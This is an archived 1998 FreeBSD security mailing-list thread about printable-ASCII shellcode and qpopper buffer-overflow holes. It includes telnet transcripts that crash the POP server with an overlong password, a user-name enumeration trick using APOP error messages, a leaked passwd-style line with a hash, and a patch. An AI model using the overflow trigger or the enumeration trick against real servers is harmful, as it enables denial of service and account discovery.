Kukulies kuku@gil.physik.rwth-aachen.de > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 07:54:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA28650 for freebsd-security-outgoing; Mon, 29 Jun 1998 07:54:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tversu.ru (root@mail.tversu.ru [62.76.80.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA28577 for ; Mon, 29 Jun 1998 07:53:34 -0700 (PDT) (envelope-from vadim@gala.tversu.ru) Received: from gala.tversu.ru (vadim@gala.tversu.ru [62.76.80.10]) by tversu.ru (8.8.8/8.8.8) with ESMTP id SAA00924 for ; Mon, 29 Jun 1998 18:52:51 +0400 (MSD) Received: (from vadim@localhost) by gala.tversu.ru (8.8.8/8.8.8) id SAA16381; Mon, 29 Jun 1998 18:52:30 +0400 (MSD) Message-ID: <19980629185230.A16373@tversu.ru> Date: Mon, 29 Jun 1998 18:52:30 +0400 From: Vadim Kolontsov To: security@FreeBSD.ORG Subject: Re: non-executable stack? References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.90.11i In-Reply-To: ; from Niall Smart on Sat, Jun 27, 1998 at 11:07:22AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Jun 27, 1998 at 11:07:22AM +0100, Niall Smart wrote: > You misunderstand. My proposal, seemingly seconded by jtb, was to > allow the administrator to disallow the presence of non-printable ascii > characters in the environment or command line arguments at the time of > execve of certain processes. We still don't know if this will have any > effect on security though, since no-one has checked to see if its possible > to write shellcode using just printable ASCII. When I played with assembler under FreeBSD, I've created a version of such code. 
Basically it contains a little "decoder" which unpacks specially prepared shell code (I've solved almost the same problem programming self-unpacking UUENCODE files). Regards, V. -- Vadim Kolontsov Tver Internet Center NOC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 09:35:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA16837 for freebsd-security-outgoing; Mon, 29 Jun 1998 09:35:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA16810 for ; Mon, 29 Jun 1998 09:35:48 -0700 (PDT) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0yqguB-0002IA-00; Mon, 29 Jun 1998 10:35:47 -0600 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.8.8/8.8.3) with ESMTP id KAA18811; Mon, 29 Jun 1998 10:35:46 -0600 (MDT) Message-Id: <199806291635.KAA18811@harmony.village.org> To: Vadim Kolontsov Subject: Re: non-executable stack? Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 29 Jun 1998 18:52:30 +0400." <19980629185230.A16373@tversu.ru> References: <19980629185230.A16373@tversu.ru> Date: Mon, 29 Jun 1998 10:35:45 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : > execve of certain processes. We still don't know if this will have any : > effect on security though, since no-one has checked to see if its possible : > to write shellcode using just printable ASCII. You can. I've seen an example of how to do that, but didn't bother to save it. I've also seen how to do the same with DNS packets, which must be nearly all in the range [a-zA-Z0-9-]+. 
I've not seen an example of this on Sparc, MIPS or Alpha, but have been
told by someone that I believe that he has code like this that fits the
bill. The Alpha was the hardest, evidently, for reasons that he didn't
elaborate on.

In message <19980629185230.A16373@tversu.ru> Vadim Kolontsov writes:
: When I played with assembler under FreeBSD, I've created a version of such
: code. Basically it contains a little "decoder" which unpacks specially
: prepared shell code (I've solved almost the same problem programming
: self-unpacking UUENCODE files).

For those that think this is hard, you might want to check out
KERMIT.BOO. This is a completely printable file that is used to
bootstrap the kermit installation process a long time ago (and maybe
still even today).

Checks for printable vs non-printable are bogus and don't buy any extra
security at the cost of inconvenience.

Warner

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security Mon Jun 29 10:34:02 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA26514 for freebsd-security-outgoing; Mon, 29 Jun 1998 10:34:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA26482 for ; Mon, 29 Jun 1998 10:33:56 -0700 (PDT) (envelope-from jer@jorsm.com)
Received: from localhost (jer@localhost) by mercury.jorsm.com (8.8.7/8.8.7) with SMTP id MAA07717; Mon, 29 Jun 1998 12:33:57 -0500 (CDT)
Date: Mon, 29 Jun 1998 12:33:56 -0500 (CDT)
From: Jeremy Shaffner
Reply-To: Jeremy Shaffner
To: freebsd-security@FreeBSD.ORG
cc: "Jordan K.
Hubbard" Subject: Stable, Complete, qpopper patch Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 1) Have things quieted down enough so that the first and subsequent problems (and broken patches) have now all been fixed? 2) Do the patches only apply to 2.41beta1 or are they also good for 2.3 or 2.4? 3) Can the patches be applied manually to the source files downloaded from Qualcomm, or must the port be built from the current source tree? (ie, fetch, build and install?) 4) If the latter for #3 is the only way, and the answer to #2 is yes, can I change the DISTNAME in the Makefile if I don't want 2.41beta1? Thanks a bunch. -===================================================================- Jeremy Shaffner JORSM Internet Senior Technical Support Northwest Indiana's Premium jer@jorsm.com Internet Service Provider support@jorsm.com http://www.jorsm.com -===================================================================- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 14:51:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA16597 for freebsd-security-outgoing; Mon, 29 Jun 1998 14:51:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gatekeeper.tsc.tdk.com (root@gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA16559 for ; Mon, 29 Jun 1998 14:51:08 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id OAA17732; Mon, 29 Jun 1998 14:48:23 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id OAA15244; Mon, 29 
Jun 1998 14:48:22 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id OAA26760; Mon, 29 Jun 1998 14:48:07 -0700 (PDT) From: Don Lewis Message-Id: <199806292148.OAA26760@salsa.gv.tsc.tdk.com> Date: Mon, 29 Jun 1998 14:48:04 -0700 In-Reply-To: njs3@doc.ic.ac.uk (Niall Smart) "Re: non-executable stack?" (Jun 27, 11:07am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: njs3@doc.ic.ac.uk (Niall Smart), Patrick McAndrew , jtb Subject: Re: non-executable stack? Cc: Wojciech Sobczuk , fpscha@schapachnik.com.ar, ncb05@uow.edu.au, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jun 27, 11:07am, Niall Smart wrote: } Subject: Re: non-executable stack? } You misunderstand. My proposal, seemingly seconded by jtb, was to } allow the administrator to disallow the presence of non-printable ascii } characters in the environment or command line arguments at the time of } execve of certain processes. We still don't know if this will have any } effect on security though, since no-one has checked to see if its possible } to write shellcode using just printable ASCII. It would certainly } make life difficult for the attacker, since it would be impossible to } overwrite the saved eip with an address on the stack since the stack } is at the top of the address space around 0xFFxxxxxx or 0xEFxxxxxx. >From my archives of the firewalls mail list: --- Forwarded mail from padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) >From firewalls-relay@tus.ssi1.COM Wed Dec 21 15:30:26 1994 Date: Wed, 21 Dec 94 15:12:55 -0500 Message-Id: <9412212012.AA09780@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. 
Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Example of the futility of determining contents from packets Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status: OR Once again the question was asked if a packet filter can detect viruses and I responded "No" at least not without a *very* complex determination first of WHAT the program is, and WHICH platform it is intended for. The following short executable program is an example of this (note that it is pgp *signed* and not "converted" to ASCII) executable ASCII using a mechanism to allow the passage of .COM files through E-mail gateways. Unlike UUENCODED files though, the ASCII itself is executable - if I had sent it without the PGP signature, many systems could execute it directly from the mail window. Extracted with PGP switch -o CARD.COM it becomes a DOS executable program 2064 bytes long. You *could* just strip the header off (down to the line that starts "XP[@PPD...") and execute that if you feel brave (the trailing signature lines do not matter). But the point is that I could have used the "ASCIIzer" (YAAA) recursively to additionally wrap the contents (in an experiment I recursively ran it on itself until the original 1k binary had become a 45k "Katchina Doll" that was still executable). Meanwhile, if nothing else, Happy Holidays, Padgett ps this is a later version (but still a "beta") than Rob rote about in CUD - for easy checking, all lines are 64d/40h characters long. pps The tune sounds OK to me but remember, I have been wearing hearing aids for over 20 years & every speaker is different. 
--- End of forwarded message from padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)

From owner-freebsd-security Mon Jun 29 19:08:21 1998
From: Niall Smart
Message-Id: <199806300203.DAA03866@indigo.ie>
Date: Tue, 30 Jun 1998 03:03:49 +0000
In-Reply-To: Warner Losh "Re: non-executable stack?" (Jun 29, 10:35am)
Reply-To: rotel@indigo.ie
To: Warner Losh, Vadim Kolontsov
Subject: Re: non-executable stack?
Cc: security@FreeBSD.ORG

On Jun 29, 10:35am, Warner Losh wrote:
} Subject: Re: non-executable stack?
[ lots of examples of people writing printable-ASCII shell code ]
> Checks for printable vs non-printable are bogus and don't buy any
> extra security at the cost of inconvenience.

Oh well, there goes another silver bullet.
Niall

--
Niall Smart.  PGP: finger njs3@motmot.doc.ic.ac.uk
FreeBSD: Turning PC's into Workstations: www.freebsd.org

From owner-freebsd-security Mon Jun 29 20:01:43 1998
Date: Mon, 29 Jun 1998 23:00:59 -0400 (EDT)
From: spork
To: "Aaron D. Gifford"
cc: bugtraq@netspace.org, John Fraizer, security@FreeBSD.ORG
Subject: Re: More problems with QPOPPER -
In-Reply-To: <359749BB.8A412952@infowest.com>

Hey, and if you use bulletins with the "BULLDB" option, look at some of the junk you find in the database... It should really only contain usernames and the last bulletin they read, right? Something odd is happening here. It looks OK for a while:

pebraguz
bright
agagescu
mgarwood
zandperl

Then you start seeing some odd things:

mmary.971113
16.nynext1.summary.971113

hmm.. not from GECOS, that's a bulletin title...

Then this:

chrisptt -->>1Gdk/WhOsSj0o christopher@foofoo.com /home/chrisptt /usr/local/bin/noshell
1chrispkpushkar

Nice, huh? What's going on in pop_bull.c?

Charles Sprickman
spork@super-g.com

----

On Mon, 29 Jun 1998, Aaron D.
Gifford wrote: > John Fraizer wrote: > > > > After applying all the patches with exception of the PAM patch in the > > .RPM'd version of qpopper2.4.src, > > I have located yet another hole in qpopper. > > > > This popper was compiled with -DAUTH in the makefile. > > > > Connecting to the popper and sending a line of garbage will now generate > > the maximum permitted size > > error. Providing an INVALID username and sending a line of garbage (1000+ > > chars), does not segfault. I > > was beginning to relax. > > > > [OverKill]:/$ telnet localhost pop3 > > Trying 127.0.0.1... > > Connected to localhost. > > Escape character is '^]'. > > +OK QPOP (version 2.4) at Victim.Com starting. > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > -ERR Command "xxxxxxxxxxxxxxxxx" (truncated) exceedes maximum permitted > > size. > > user blah > > +OK Password required for blah. 
> > pass > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > > > -ERR Password supplied for "blah" is incorrect. > > +OK Pop server at Victim.Com signing off. > > Connection closed by foreign host. > > > > I decided to try a long username: > > > > [OverKill]:/$ telnet localhost pop3 > > Trying 127.0.0.1... > > Connected to localhost. > > Escape character is '^]'. > > +OK QPOP (version 2.4) at Victim.Com starting. 
> > user > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > -ERR Argument 1 "xxxxxxxxxxxxxxxxx" (truncated) exceeds maximum permitted > > size. > > > > Handled it just fine. > > > > Then, I decided to try a VALID username: > > > > [OverKill]:/$ telnet localhost pop3 > > Trying 127.0.0.1... > > Connected to localhost. > > Escape character is '^]'. > > +OK QPOP (version 2.4) at Victim.Com starting. > > user valid > > +OK Password required for valid. 
> > pass > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > Connection closed by foreign host. > > > > It segfaulted and dumped core. > > > > Damnit, Jim, I'm a Doctor not a C programmer! I have managed to locate > > the portion of the code that is bypassing the " -ERR Command > > "xxxxxxxxxxxxxxxxx" (truncated) exceedes maximum permitted size. " code > > from the installed patches: > > > > In pop_parse.c, we find: > > > > /* > > * This is kinda gross. Passwords have to be parsed diffrently > > * as they may contain spaces. If you think of a cleaner way, > > * do it. The "p->pop_command[0] == 'p'" is so save a call to > > * strcmp() on ever call to pop_parse(); This parsing keeps > > * leading and trailing speces behind for the password command. 
> > */
> >     if(p->pop_command[0] == 'p' && strcmp(p->pop_command,"pass") == 0) {
> >         if (*mp != 0) {
> >             p->pop_parm[1] = mp;
> >             if (strlen(mp) > 0) {
> >                 mp = mp + strlen(mp) - 1;
> >                 while (*mp == 0xa || *mp == 0xd) *mp-- = 0;
> >             }
> >
> > Looks like basically that if the parser sees that the command was actually
> > a password argument, it doesn't send it through the truncate code.
>
> Looks like qpopper after the "if(p->pop_command..." bit assumes everything
> else in the buffer is the password except any trailing CR/LF characters, which
> it removes. I cannot understand the "if (strlen(mp) > 0) {" test, because the
> previous "if (*mp != 0) {" test should guarantee that strlen() will always at
> least return 1.
>
> For those who want to be consistent about limiting argument length using
> MAXPARMLEN, you can try this snippet instead of the above existing snippet in
> pop_parse.c:
>
>     if(p->pop_command[0] == 'p' && strcmp(p->pop_command,"pass") == 0) {
>         if (*mp != 0) {
>             if (strlen(mp) > MAXPARMLEN) {
>                 mp[MAXPARMLEN] = '\0';
>                 pop_msg(p,POP_FAILURE,
>                     "Argument %d \"%s\" (truncated) exceeds maximum permitted size.",
>                     i+1, mp);
>                 return(-1);
>             }
>             p->pop_parm[1] = mp;
>             mp = mp + strlen(mp) - 1;
>             while (*mp == 0xa || *mp == 0xd) *mp-- = 0;
>             return(1);
>         } else
>             return (-1);
>     }
>
> PLEASE be aware that you need a large enough MAXPARMLEN defined in popper.h to
> handle large passwords or APOP depending on your individual needs. I've been
> using 32 on my system, which should permit APOP to work.
>
> Another fun qpopper trivia fact for the security conscious: While looking at
> the APOP stuff, I see that it is possible to glean valid user names from sites
> using certain configurations of qpopper with APOP support. For example:
>
> localhost# telnet localhost 110
> +OK QPOP (version 2.41beta1) at localhost starting. <18115.899106609@localhost>
> APOP bogus-user 1638de71888f8c3ff023ac5c38621211
> -ERR Password supplied for "bogus" is incorrect.
> +OK Pop server at localhost signing off.
> Connection closed by foreign host.
> localhost# telnet localhost 110
> +OK QPOP (version 2.41beta1) at localhost starting. <18119.899106628@localhost>
> APOP real-user 8463af56e9a5d72cc84012ad7748f92c
> -ERR not authorized
> +OK Pop server at localhost signing off.
> Connection closed by foreign host.
> localhost#
>
> Nice. In some cases where APOP support is compiled in but the APOP database
> does not exist, the error message on a valid user might be "-ERR POP
> authorization DB not available (real-user)" instead of the "-ERR not
> authorized" message. I don't know if this would work for sites with properly
> configured APOP or not. It worked on my own machine which does NOT use APOP
> but had APOP compiled in by default.
>
> Aaron out.

From owner-freebsd-security Tue Jun 30 01:06:25 1998
To: Jeremy Shaffner
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Stable, Complete, qpopper patch
In-reply-to: Your message of "Mon, 29 Jun 1998 12:33:56 CDT."
Date: Tue, 30 Jun 1998 01:05:22 -0700
Message-ID: <7493.899193922@time.cdrom.com>
From: "Jordan K. Hubbard"

> 1) Have things quieted down enough so that the first and subsequent
> problems (and broken patches) have now all been fixed?

Yes, I believe so.

> 2) Do the patches only apply to 2.41beta1 or are they also good for 2.3 or
> 2.4?

Don't know.

> 3) Can the patches be applied manually to the source files downloaded from
> Qualcomm, or must the port be built from the current source tree? (ie,
> fetch, build and install?)

Don't know.

> 4) If the latter for #3 is the only way, and the answer to #2 is yes, can
> I change the DISTNAME in the Makefile if I don't want 2.41beta1?

Don't know. :-)

- Jordan

From owner-freebsd-security Tue Jun 30 02:37:19 1998
Message-ID: <19980630023639.02857@hydrogen.nike.efn.org>
Date: Tue, 30 Jun 1998 02:36:39 -0700
From: John-Mark Gurney
To: andrewr
Cc: Christoph Kukulies, freebsd-security@FreeBSD.ORG
Subject: Re: xlock
References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE>
In-Reply-To: from andrewr on Mon, Jun 29, 1998 at 08:27:49AM -0400
Reply-To: John-Mark Gurney
Organization: Cu Networking

andrewr scribbled this message on Jun 29:
> Also, I am porting a console locking program (doesn't allow VT switching),
> from linux, but I have been having trouble with the actual stopping of the
> allowing of VT switching. I have tried setting vtmode to be handled by
> the process, then using an ioctl to execute this. This failed. Then, I
> tried using flock(), that failed. If you have any ideas and would like to
> know what I did before (dealing with flock() and ioctl(), just ask).

I have modifications to lock that do this... it really isn't hard... you just simply modify the relsig of vt_mode to a signal, and simply ignore the signal... syscons will only switch away when you tell it that it can... this is how X restores the video mode for syscons...

> On Mon, 29 Jun 1998, Christoph Kukulies wrote:
> >
> > Alarmed by recent buffer overflow attacks on Linux machines in
> > my vicinity (an exploit for this is available) I thought about
> > xlock under FreeBSD and would like to know whether the
> > security hole has been sorted out under FreeBSD 2.2.x or what
> > measures are advised to prevent it.

p.s. why do people not spend the 2 seconds it takes to remove sigs??

--
John-Mark Gurney                          Voice: +1 541 683 7109
Cu Networking                             P.O. Box 5693, 97405

Live in Peace, destroy Micro$oft, support free software, run FreeBSD
Don't trust anyone you don't have the source for

From owner-freebsd-security Tue Jun 30 09:24:12 1998
Message-ID: <19980630182358.B1060@cityip.co.za>
Date: Tue, 30 Jun 1998 18:23:58 +0200
From: Johann Visagie
To: security@internet.org.za, security@FreeBSD.ORG
Subject: New Qpopper released to fix hole

ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper2.5.tar.Z

Read the README in the same directory for more info.
--
V
Johann Visagie | Email: wjv@CityIP.co.za | Tel: +27 21 419-7878

From owner-freebsd-security Tue Jun 30 11:32:26 1998
Date: Tue, 30 Jun 1998 13:30:55 -0500 (CDT)
From: Jeremy Shaffner
To: Brian Somers
cc: Sasha Egan, brian@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Remote exploit in qpopper.
In-Reply-To: <199806300740.IAA11820@awfulhak.org>

There is also a new version released today from Qualcomm. 2.5 is patched against all known problems. ftp://ftp.qualcomm.com/eudora/servers/popper/.

FWIW, I compiled the exploit (known as qpush or qpop) and tried it on an unpatched 2.41beta1. Although it did cause an overflow and popper exited with a signal 11, it did not provide a root shell. The author of this particular exploit (It's available on the bugtraq list or from rootshell) says that it only works on 2.2 or 2.41b1 and only on Linux systems. (The exploit itself can be run from any platform.)

The patches that Jordan has made do work. You can get the new -current port and build that, or get 2.5 from qualcomm and build it yourself.
On Tue, 30 Jun 1998, Brian Somers wrote:

> > Hey Brian,
> > I dunno if you have been watching some of the lists but there is some
> > definite problems in Qualcom's popper...
> [.....]
>
> Looks like I spoke too soon. A pile of patches have now been made to
> popper :-)
>
> > Sasha Egan
